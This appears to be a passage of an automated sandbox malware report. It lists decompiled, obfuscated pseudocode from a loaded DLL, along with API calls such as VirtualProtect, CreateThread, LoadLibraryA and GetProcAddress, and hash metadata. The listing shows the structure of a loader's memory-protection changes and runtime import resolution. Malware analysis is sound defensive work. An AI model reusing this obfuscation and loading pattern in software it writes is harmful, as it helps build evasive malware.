                                				_t33 = E00000201201640C8D50(_t89, _a8, _t111, _t111, _t117, _t88, _t124);
                                				r8d = 0;
                                				if (_t33 != r8d) goto 0x640c365a;
                                				_t112 = _t117;
                                				if (_t117 == _t124) goto 0x640c360c;
                                				goto 0x640c3519;
                                				if (_t33 != r8d) goto 0x640c365a;
                                				if (E00000201201640C69A0(_t33 - r8d, _t89, _t88,  &_a24, _t117, _t119,  &_a16, _t130) != 0) goto 0x640c365c;
                                				r9d = _a16;
                                				E00000201201640C90D8(_t89, _a8, _t112, _t117, _a24);
                                				HeapFree(??, ??, ??);
                                				goto 0x640c365c;
                                				E00000201201640C908C(0x77c56b19, _t88,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t88 == _t112) goto 0x640c3674;
                                				 *_t88();
                                				HeapFree(??, ??, ??);
                                				goto 0x640c3689;
                                				HeapFree(??, ??, ??);
                                				goto 0x640c369e;
                                				return 8;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID:
                                • API String ID: 3901518246-0
                                • Opcode ID: c7f4851af72390d08a83b741b1e5df915c470d94f4f546358617c873bfd904c4
                                • Instruction ID: 319f34f4993c139eb63fd85797b3db770d2be160acd6e2f44c8bdef222b669e9
                                • Opcode Fuzzy Hash: c7f4851af72390d08a83b741b1e5df915c470d94f4f546358617c873bfd904c4
                                • Instruction Fuzzy Hash: 8F510C61720770C3FB6497269D4A7EDA295B78C7C4F948015BF4943F9EDE3AC8A28708
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00007FFC7FFC130E9BA0(void* __rax, void* __rcx, void* __rdx, long long __r8, void* __r10, void* __r11, intOrPtr _a8, long long _a24, intOrPtr _a32, intOrPtr _a48, intOrPtr _a56, intOrPtr _a64, intOrPtr _a72, intOrPtr _a80, intOrPtr _a96, intOrPtr _a104) {
                                				intOrPtr _v72;
                                				intOrPtr _v76;
                                				intOrPtr _v84;
                                				intOrPtr _v88;
                                				intOrPtr _t88;
                                				signed long long _t121;
                                				long long _t123;
                                				intOrPtr _t126;
                                				signed long long _t130;
                                
                                				_a32 = r9d;
                                				_a24 = __r8;
                                				r10d = _a80;
                                				r11d = _a72;
                                				r11d = r11d + 0xffffd852;
                                				r8d = __rdx - 0x882;
                                				_a80 = __rcx - 0x38e9;
                                				_v84 = r8d;
                                				_t88 = __rdx - 0x27ae;
                                				r8d = __rax - 0x113b;
                                				_v76 = _t88;
                                				_a72 = r11d;
                                				_a96 = _a104 + 0x10a3;
                                				_v88 = __r10 - 0x113b;
                                				_a56 = _a48 + 0xffffdfce;
                                				_v72 = __rax + 0x106;
                                				_a8 = __rax + 0x1371;
                                				_t121 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x2e8)) + 0x3c)) +  *((intOrPtr*)(__r8 + 0x2e8));
                                				 *(__r8 + 0x2f0) = _t121;
                                				_t130 = __r8 + 0x1f0;
                                				_a104 = __rdx + 0x1033;
                                				 *(__r8 + 0x2f8) = _t121 ^ 0x000023f7;
                                				if ( *_t130 -  *((intOrPtr*)(__r8 + 0x1c8)) > 0) goto 0x130e9cd0;
                                				 *(__r8 + 0x198) = " periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard struck pigeon branches persuade stretch previous mute frail flank cone winner combination plane wander sack children traverse skip probability plays dagger midst throne whip final particles trick compassion selling replacement prospect even relay between quarter beg monks yell speedometer dam ";
                                				 *(__r8 + 0x198) =  *(__r8 + 0x198) | _t130;
                                				_t123 =  *((intOrPtr*)(__r8 + 0x2d8));
                                				 *((long long*)(__r8 + 0x318)) = _t123;
                                				_a48 = __r10 - 0x283;
                                				_a64 = __r10 - 0x64c;
                                				 *((long long*)(__r8 + 0x320)) =  *((intOrPtr*)(_t123 + 0x3c)) + _t123;
                                				 *(__r8 + 0x120) = 0x1137;
                                				 *(__r8 + 0xc8) =  *(__r8 + 0xc8) * ( *(__r8 + 0x1c0) | 0x00003595);
                                				 *((long long*)(__r8 + 0x308)) =  *((intOrPtr*)(__r8 + 0x2d8));
                                				 *(__r8 + 0x198) =  *(__r8 + 0x198) + 0xfffffef0 -  *((intOrPtr*)(__r8 + 0x1c8));
                                				_t126 =  *((intOrPtr*)(__r8 + 0x140));
                                				 *(__r8 + 0x58) =  *(__r8 + 0x58) |  *(_t126 + 0x198);
                                				 *(_t126 + 0x198) =  *(_t126 + 0x198) + 1;
                                				 *( *(__r8 + 0x1c0) + 0x48) =  *( *(__r8 + 0x1c0) + 0x48) ^ ( *(__r8 + 0x120) | 0x0000343a);
                                				if (r11d == _t130 - 0x1371) goto 0x130e9dce;
                                				if (_t88 - __r11 + 0x2103 >= 0) goto 0x130e9de1;
                                				 *((intOrPtr*)(__r8 + 0x310)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x320)) + 0x50));
                                				 *( *((intOrPtr*)(__r8 + 0x1c8)) + 0xc8) =  *( *((intOrPtr*)(__r8 + 0x1c8)) + 0xc8) ^  *(__r8 + 0xe0) * 0x00002598;
                                				return __r8 + 0x927;
                                			}

                                APIs
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7CFC
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7E18
                                • CreateThread.KERNEL32 ref: 00007FFC130EA238
                                Strings
                                • periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard , xrefs: 00007FFC130E9CC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ProtectVirtual$CreateThread
                                • String ID: periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard
                                • API String ID: 3076554488-3474123047
                                • Opcode ID: 4263ff401d75dabcc09657429b698b9b49345b6e88aabbc26032a9ba9cf8f7b2
                                • Instruction ID: 7aa72a8c8360acabfc69f9a29f08cc02608c01e6ce324a6e3fa985b3efb6a692
                                • Opcode Fuzzy Hash: 4263ff401d75dabcc09657429b698b9b49345b6e88aabbc26032a9ba9cf8f7b2
                                • Instruction Fuzzy Hash: 11024A736186D48BD3A5CF19E485BDEB7A8F788744F01412AEB8953B58DB38DA64CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 30%
                                			E00007FFC7FFC130E90B0(void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __r8, void* __r11, long long _a8, signed int _a16, signed int _a24, signed int _a40, signed int _a48, signed int _a56, signed int _a64, signed int _a72, signed int _a80, signed int _a96, signed int _a104, signed int _a112) {
                                				intOrPtr _v64;
                                				signed int _v68;
                                				signed int _v72;
                                				intOrPtr _v88;
                                				signed int _v96;
                                				signed int _v104;
                                				signed int _v112;
                                				signed int _v120;
                                				signed int _v128;
                                				signed int _v136;
                                				signed int _v144;
                                				signed int _v152;
                                				signed int _v160;
                                				signed int _v168;
                                				void* __rdi;
                                				signed int _t159;
                                				intOrPtr _t162;
                                				signed int _t164;
                                				signed int _t172;
                                				signed int _t173;
                                				intOrPtr _t198;
                                				signed int _t214;
                                				void* _t229;
                                				intOrPtr _t243;
                                				signed int _t256;
                                				signed long long _t259;
                                				signed long long _t260;
                                				signed long long _t262;
                                				long long _t269;
                                				signed long long _t272;
                                				void* _t273;
                                				void* _t284;
                                				signed long long _t285;
                                				void* _t290;
                                				void* _t293;
                                				void* _t294;
                                				void* _t295;
                                				void* _t296;
                                
                                				_a8 = __rbx;
                                				r12d = __rdx - 0x3a59;
                                				r11d = _a72;
                                				r13d = __rdx - 0x1663;
                                				r15d = _a56;
                                				r14d = _a96;
                                				r8d = r8d + 0xfffff374;
                                				_a40 = __rcx - 0x329d;
                                				r10d = _t296 + 0x4c0;
                                				_a24 = _a80 + 0x2b1;
                                				_v68 = r12d;
                                				_v72 = __r11 - 0x3189;
                                				r11d = r11d + 0x4dd;
                                				_a64 = r10d;
                                				_a80 = _a64 + 0xfffffbf4;
                                				r10d = r10d + 0xffffee61;
                                				_a104 = r8d;
                                				r8d = __rax - 0x19bd;
                                				r9d = __rax - 0x202;
                                				_a72 = r8d;
                                				_a16 = r9d;
                                				_a56 = __rcx + 0x2f8;
                                				r9d = r9d + 0xffffed0f;
                                				_v64 = _t295 + 0x13eb;
                                				_v96 = _t293 + 0x38e9;
                                				r8d = _t294 - 0x2f3;
                                				_v104 = r10d;
                                				_v112 = r11d;
                                				_v120 = r14d;
                                				_v128 = __r8 + 0x125d;
                                				_t256 = _a48;
                                				_v136 = _t294 + 0x119f;
                                				_v144 = r15d;
                                				_v152 = _a112 + 0xffffeb0d;
                                				_v160 = _t256;
                                				_v168 = __rcx + 0x278;
                                				_t159 = E00007FFC7FFC13100720(__rcx, _t273, __r8, _t284, _t290);
                                				_t259 =  *((intOrPtr*)(_t256 + 0x23c));
                                				r8d = 0x2032;
                                				 *(_t256 + 0x158) = _t259;
                                				_t285 =  *((intOrPtr*)(_t256 + 0x1a0));
                                				_a96 = _t159;
                                				if (( *(_t285 + 0x130) ^ 0x000003c5) - r8d < 0) goto 0x130e929f;
                                				asm("o16 nop [eax+eax]");
                                				_t269 =  *((intOrPtr*)(_t256 + 0xc8)) + (_t285 | __r8);
                                				r8d = r8d + 1;
                                				 *((long long*)(_t256 + 0xc8)) = _t269;
                                				_t260 = _t259 ^ 0x000003c5;
                                				if (r8d - _t260 <= 0) goto 0x130e9280;
                                				_t243 =  *((intOrPtr*)(_t256 + 0x1c8));
                                				_v120 = 0x13103850;
                                				_v128 = 0x40;
                                				r8d = 0x2032;
                                				_v136 = 0xbb;
                                				r9d = 0x2103;
                                				_v144 =  *((intOrPtr*)(_t243 + 0xb0)) - 0x27ab;
                                				_v152 =  *((intOrPtr*)(_t256 + 0x130)) - 0x22cb;
                                				_v160 = 0x30d5;
                                				_v168 = _t256;
                                				_t162 = E00007FFC7FFC130FF290(0x2598, 0x27b2, _t256, _t273, __r8, 0x13103850);
                                				r11d = _a72;
                                				r11d = r11d + 0x4ca;
                                				r9d = _t260 - 0x77c;
                                				_v136 = _t256;
                                				r10d = _t260 - 0x522;
                                				 *((intOrPtr*)(_t256 + 0x23c)) = _t162;
                                				r8d = _t269 - 0x16b5;
                                				 *((long long*)(_t256 + 0x198)) =  *((long long*)(_t256 + 0x198)) + 0x228c;
                                				_v144 = _t273 - 0x1337;
                                				_v152 = r9d;
                                				r9d = r8d;
                                				_v160 = r10d;
                                				_v168 = r11d;
                                				_t164 = E00007FFC7FFC130FDA50(_t260, 0x13103850, _t285 + 0x130);
                                				r10d = _a112;
                                				_a16 = _t164;
                                				r10d = r10d + 0xfffff8a0;
                                				if (r12d == _t243 - 0x17b) goto 0x130e95f7;
                                				_t86 = _t269 - 0x13eb; // -5099
                                				if (_t295 + 0x13eb == _t86) goto 0x130e941a;
                                				 *(_t256 + 0x158) =  *((intOrPtr*)(_t256 + 0x98));
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0x130)) + 0x1045 == 0x343a) goto 0x130e95f7;
                                				asm("o16 nop [eax+eax]");
                                				 *(_t256 + 0x80) =  *(_t256 + 0x80) ^ 0x000027b2;
                                				if (0x343b != _t260) goto 0x130e93f0;
                                				goto 0x130e95f7;
                                				if ( *(_t256 + 0x110) - ((r10d ^ 0x000027b2) &  *(_t256 + 0x28)) > 0) goto 0x130e95a4;
                                				_t214 =  *_t256;
                                				r11d =  *(_t256 + 0x110);
                                				r11d = r11d | _a96;
                                				r12d =  *(_t256 + 0x228);
                                				r11d = r11d ^ _t214;
                                				r9d =  *(_t256 + 0x1c0);
                                				r14d = _t269 + _t269;
                                				r8d =  *(_t256 + 0x90);
                                				r15d = r9d;
                                				r8d = r8d & 0x00000188;
                                				r15d = r15d ^ _a80;
                                				r8d = r8d | 0x00002626;
                                				_t262 = _t273 + 0x0000228c ^ _a40;
                                				r12d = r12d * _t214;
                                				 *(_t256 + 0x70) =  *(_t256 + 0x70) - _t262;
                                				_t198 =  *((intOrPtr*)(_t256 + 0x1e0));
                                				r12d = r12d &  *(_t256 + 0x1b8);
                                				_a112 = ( *(_t256 + 0x80) ^ 0xfffffe7f) & 0x00002598;
                                				_t172 =  *(_t256 + 0x188);
                                				r13d = _t172;
                                				r13d = r13d | _a24;
                                				_t173 =  *(_t256 + 0x200);
                                				r13d = r13d - r10d;
                                				r10d = _a72;
                                				r10d = r10d + _t198;
                                				r10d = r10d + _a16;
                                				_v88 = ( *(_t256 + 0x1f8) | _v72) + _a64;
                                				_v96 = r10d;
                                				_v104 = r11d;
                                				_v112 = _t256;
                                				_v120 = _v68 ^ 0x000027ae;
                                				_v128 =  *(_t256 + 0x1b0) * _t173;
                                				_v136 = _t173 & r10d ^  *(_t256 + 0x40);
                                				_v144 = _a64 + _t198 ^ _t172;
                                				_v152 = r14d;
                                				_v160 = r15d;
                                				_v168 = r12d;
                                				E00007FFC7FFC130FED60(_a112, r13d, _t229, _a40, _t256, _t262, _t269,  *(_t256 + 0x80) ^ 0x000027b2,  *((intOrPtr*)(_t256 + 0x30)), _t285 + 0x130);
                                				 *(_t256 + 0x200) =  *(_t256 + 0x200) - _t262;
                                				DeleteCriticalSection(??);
                                				goto 0x130e95f7;
                                				if ( *(_t256 + 0x90) == ( *((intOrPtr*)(_t256 + 0xc8)) -  *((intOrPtr*)(_t256 + 0x60)) ^ 0x00002598)) goto 0x130e95f7;
                                				_t272 =  *(_t256 + 0x120) |  *(_t256 + 0x70);
                                				if (r13d - _t272 >= 0) goto 0x130e95f7;
                                				r13d = r13d + 1;
                                				if (r13d - _t272 < 0) goto 0x130e95e2;
                                				 *((long long*)(_t256 + 0x220)) =  *((intOrPtr*)(_t256 + 0x220)) + (r12d ^ 0x000030d5);
                                				return _a56 + 0xfffff21d;
                                			}










































                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CriticalDeleteSection
                                • String ID: @
                                • API String ID: 166494926-2766056989
                                • Opcode ID: 67b7e4b7d29307a53d3832543a141100a8672ce9b9caf98ece6757bfb83f9feb
                                • Instruction ID: f6e26b13be22ae32d92d309f828c8c061cd17a1958827622a16ecc931032f548
                                • Opcode Fuzzy Hash: 67b7e4b7d29307a53d3832543a141100a8672ce9b9caf98ece6757bfb83f9feb
                                • Instruction Fuzzy Hash: EDD154736186C58BD364CF24E494BEAB7A4F788758F044139DB8A57B88DB38E990CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EFB70(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                                				signed long long _t15;
                                				signed long long _t16;
                                				void* _t24;
                                				signed long long _t33;
                                
                                				_t15 = _t33;
                                				 *((long long*)(_t15 + 8)) = __rbx;
                                				 *((long long*)(_t15 + 0x10)) = __rbp;
                                				 *((long long*)(_t15 + 0x18)) = __rsi;
                                				 *((long long*)(_t15 + 0x20)) = __rdi;
                                				_t16 = _t15 | 0xffffffff;
                                				_t24 = _t16 + 1;
                                				if ( *((char*)(__rcx + _t24)) != 0) goto 0x130efba0;
                                				if (_t24 + __rdx - _t16 - __r8 <= 0) goto 0x130efbdb;
                                				return __rdx + 0xb;
                                			}








                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: a5c22a8428412bf3b9384cd49374f5d3c3e3a1ab06a7deca538eca9ebce93d66
                                • Instruction ID: 88739cb1910cf7f7e0e4ba99ec83bca8e9f87904eade4c2f1ddd7c782aeb0233
                                • Opcode Fuzzy Hash: a5c22a8428412bf3b9384cd49374f5d3c3e3a1ab06a7deca538eca9ebce93d66
                                • Instruction Fuzzy Hash: 22310B22B18EA945F7209A22D8047AA6AD1AB85BF8F158335DE6C17BC5CE3CD525C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 56%
                                			E00007FFC7FFC130FB9B0(intOrPtr __edx, signed int __rcx, signed int __rdx, long long __rsi, signed int __rbp, void* __r8, long long __r9, long long __r12, long long __r13, long long __r14, void* _a8, intOrPtr _a16, signed int _a24, signed long long _a32) {
                                				void* _v32;
                                				void* _v40;
                                				void* _v48;
                                				void* _v56;
                                				signed int _t163;
                                				void* _t183;
                                				void* _t186;
                                				void* _t187;
                                				void* _t189;
                                				signed long long _t202;
                                				long long _t226;
                                				signed long long _t229;
                                				signed long long _t235;
                                				signed int _t245;
                                				signed int _t265;
                                				intOrPtr _t269;
                                				signed long long _t276;
                                				signed long long _t281;
                                				signed long long _t284;
                                				signed long long _t285;
                                				intOrPtr _t291;
                                				struct HINSTANCE__* _t292;
                                				intOrPtr* _t294;
                                				signed long long _t296;
                                				long long* _t299;
                                				void* _t304;
                                				signed long long _t309;
                                				intOrPtr _t312;
                                				intOrPtr _t314;
                                				void* _t316;
                                				signed long long _t318;
                                				intOrPtr* _t322;
                                				signed long long* _t326;
                                				CHAR* _t328;
                                
                                				_t316 = _t304;
                                				 *((long long*)(_t316 + 0x20)) = __r9;
                                				 *(_t316 + 0x18) = r8d;
                                				_a16 = __edx;
                                				_t314 =  *((intOrPtr*)(__rcx + 0x118));
                                				_t245 = __rcx;
                                				r15d = r8d;
                                				if ( *((intOrPtr*)(_t314 + 0x88 + __rcx * 8)) == 0) goto 0x130fbeec;
                                				 *((long long*)(_t316 - 0x30)) = __r13;
                                				r13d =  *((intOrPtr*)(_t314 + 0x90));
                                				 *(__rcx + 0xc8) =  *(__rcx + 0xc8) | 0x0acff869;
                                				_t322 = __r13 + 0xc +  *((intOrPtr*)(__rcx + 0xc0));
                                				if ( *_t322 == 0) goto 0x130fbedc;
                                				 *((long long*)(_t316 + 8)) = __rbp;
                                				 *((long long*)(_t316 - 0x20)) = __rsi;
                                				 *((long long*)(_t316 - 0x28)) = __r12;
                                				 *((long long*)(_t316 - 0x38)) = __r14;
                                				_t19 = _t245 + 0x198; // 0x229b
                                				_t326 = _t19;
                                				_t202 =  *(__rcx + 0x188) ^  *(__rcx + 0x120) ^ 0x00003189;
                                				 *(__rcx + 0x120) = _t202;
                                				LoadLibraryA(_t328);
                                				_t318 = _t202;
                                				if (_t202 == 0) goto 0x130fbea2;
                                				 *_t326 = _t326;
                                				 *(__rcx + 0x1e0) =  *(__rcx + 0x228) ^ __rbp;
                                				_t299 = __rsi +  *((intOrPtr*)(__rcx + 0xc0));
                                				 *( *((intOrPtr*)(__rcx + 0x30)) + 0xe8) =  *( *((intOrPtr*)(__rcx + 0x30)) + 0xe8) ^  *(__rcx + 0xc8) + 0x0000329d;
                                				if ( *((intOrPtr*)(_t322 - 0xc)) !=  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c8)) + 0x130)) - 0x23f7) goto 0x130fbb6c;
                                				_t183 =  *( *((intOrPtr*)(__rcx + 0x1a0)) + 0x130) * 0xc285f6d4 - 0x228d;
                                				if (_t183 == 0) goto 0x130fbb03;
                                				if (_t183 != 0) goto 0x130fbaf6;
                                				 *(__rcx + 0x1b0) = __rdx |  *_t326;
                                				_t281 =  *(__rcx + 0x1e0);
                                				 *(__rcx + 0x100) =  *(__rcx + 0x100) + _t281 * 0x1f2c;
                                				 *( *(__rcx + 0x40) + 0x198) =  *( *(__rcx + 0x40) + 0x198) | _t281 + 0x00001f2c;
                                				_t163 =  *(__rcx + 0x200) * 0x51e8c56e;
                                				r8d =  *(__rcx + 0xb0) * 0xf993a29a;
                                				if (_t163 - __r8 > 0) goto 0x130fbc27;
                                				if (_t163 + 1 - __r8 <= 0) goto 0x130fbb51;
                                				 *_t326 =  *_t326 + (__rbp ^  *_t326);
                                				goto 0x130fbc27;
                                				_t186 =  *((intOrPtr*)( *__rcx + 0x188)) + 0x1407 - 0x343a;
                                				if (_t186 == 0) goto 0x130fbbac;
                                				_t309 = __rbp | 0x00003a59;
                                				if (_t186 != 0) goto 0x130fbba0;
                                				 *_t326 =  *_t326 - _t309;
                                				 *_t326 =  *_t326 *  *(__rcx + 0x110) * 0x343a;
                                				_t294 = _t299 +  *((intOrPtr*)(__rcx + 0xc0));
                                				_t187 = ( *(__rcx + 0x200) ^ 0x00000db8) - 0x3a5a;
                                				if (_t187 == 0) goto 0x130fbbfd;
                                				_t284 = __rbp ^ 0x0000343a;
                                				if (_t187 != 0) goto 0x130fbbf3;
                                				 *(__rcx + 0x78) = _t284;
                                				 *(__rcx + 0x1b0) =  *(__rcx + 0x1b0) ^ ( *(__rcx + 0x1b8) | 0x00003189);
                                				 *((long long*)( *(__rcx + 0x40) + 0xf0)) =  *((intOrPtr*)(__rcx + 0x70)) - 0x2103;
                                				 *( *(__rcx + 0x40) + 0x58) =  *(__rcx + 0x100) | _t328;
                                				if ( *_t294 == 0) goto 0x130fbe4e;
                                				asm("o16 nop [eax+eax]");
                                				_t189 =  *( *((intOrPtr*)(__rcx + 0x30)) + 0xb8) * 0x244f8775 - 0x30d6;
                                				if (_t189 == 0) goto 0x130fbc9a;
                                				_t265 =  *(__rcx + 0x1e0);
                                				asm("o16 nop [eax+eax]");
                                				_t285 = _t284 - 1;
                                				if (_t189 != 0) goto 0x130fbc80;
                                				 *(__rcx + 0x1e0) = _t265 + 1;
                                				 *(__rcx + 0x1b8) = _t265;
                                				_t312 =  *_t294;
                                				if (_t312 >= 0) goto 0x130fbd3c;
                                				r8d =  *( *((intOrPtr*)(_t318 + 0x3c)) + _t318 + 0x88 + _t285 * 8);
                                				_t269 =  *((intOrPtr*)(__rcx + 0x1c8));
                                				r8d =  *(_t309 + _t318 + 0x1c);
                                				 *(__rcx + 0x1e0) =  *(__rcx + 0x1e0) +  *((intOrPtr*)(_t269 + 0x1b0));
                                				 *((long long*)(_t269 + 0x1b0)) =  *((long long*)(_t269 + 0x1b0)) + 1;
                                				r9d =  *((intOrPtr*)(_t309 +  *(__rcx + 0x40) * (_t285 -  *(__rcx + 0x40)) + _t318));
                                				 *( *((intOrPtr*)(__rcx + 0x1a0)) + 0xe0) =  *( *((intOrPtr*)(__rcx + 0x1a0)) + 0xe0) |  *((intOrPtr*)( *__rcx + 0x198)) + _t328;
                                				 *_t299 = _t312 + _t318;
                                				_t226 = __rbp -  *_t326;
                                				 *((intOrPtr*)(__rcx + 0x48)) =  *((intOrPtr*)(__rcx + 0x48)) + _t226;
                                				goto 0x130fbdea;
                                				GetProcAddress(_t292);
                                				 *_t299 = _t226;
                                				_t291 =  *((intOrPtr*)(__rcx + 0x1c8));
                                				if ( *((intOrPtr*)(__rcx + 0x130)) - _t318 > 0) goto 0x130fbd81;
                                				 *((intOrPtr*)(__rcx + 0x90)) =  *((intOrPtr*)(__rcx + 0x90)) +  *((intOrPtr*)(__rcx + 0x48)) - 0x2032;
                                				if ( *((intOrPtr*)(_t291 + 0x130)) - 0x3c5 - 0x3a59 >= 0) goto 0x130fbdab;
                                				_t229 =  *(__rcx + 0x110);
                                				 *(__rcx + 0xc8) = _t229;
                                				 *(__rcx + 0x110) = _t229 + 1;
                                				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c0)) + 0x218)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c0)) + 0x218)) + 0xfffffe78 - __rcx;
                                				if ( *__rcx -  *((intOrPtr*)(__rcx + 0x140)) < 0) goto 0x130fbdea;
                                				_t235 = __rbp ^ 0x00001f2c;
                                				 *(__rcx + 0x1b0) =  *(__rcx + 0x1b0) | _t235;
                                				r8d = 0x36e7;
                                				r8d = r8d + 1;
                                				 *((intOrPtr*)(__rcx + 0x1f8)) =  *((intOrPtr*)(__rcx + 0x1f8)) - _t235 * 0x2598;
                                				if (r8d != _t291) goto 0x130fbdf4;
                                				 *(__rcx + 0x220) =  *(__rcx + 0x1b0) ^  *(__rcx + 0x220) ^ 0x00003595;
                                				if ( *((long long*)(_t294 + 8)) != 0) goto 0x130fbc50;
                                				_t296 = _a32;
                                				r15d = _a24;
                                				_t276 =  *(__rcx + 0x1e0) - _t296 |  *(__rcx + 0x1e0);
                                				 *(__rcx + 0x1e0) = _t276;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1a0)) + 0x200)) - 0x544 - 0x329e >= 0) goto 0x130fbe9e;
                                				 *_t326 =  *_t326 + _t276 * _t296 * _t296;
                                				 *_t326 =  *_t326 ^ 0x00001663;
                                				if ( *((intOrPtr*)(_t322 + 0x14)) != 0) goto 0x130fba40;
                                				return 0;
                                			}

                                APIs
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00007FFC130FDB93,?,?,?,?,?,?,?,00007FFC130FAD80), ref: 00007FFC130FBA66
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00007FFC130FDB93,?,?,?,?,?,?,?,00007FFC130FAD80), ref: 00007FFC130FBD4D
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2574300362-0
                                • Opcode ID: b8fb5429e7cfc8db786e1fc3a60dd63ed19924fa30ef64d9c899e3a35c4c87c6
                                • Instruction ID: 78240237656abe3eef44154fe10b9a48f11be62b1585807952f3114f14da6cdd
                                • Opcode Fuzzy Hash: b8fb5429e7cfc8db786e1fc3a60dd63ed19924fa30ef64d9c899e3a35c4c87c6
                                • Instruction Fuzzy Hash: BCD16732705B9886EB45CF29D9987AD37A8F748B98F098136CE4D8B398DF38D950C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E00007FFC7FFC130FF8F0(void* __ebx, void* __esi, void* __eflags, long long __rcx, long long __rdx, signed int* __r8, long long __r9, signed int* __r11) {
                                				void* __rbx;
                                				intOrPtr _t480;
                                				signed char _t492;
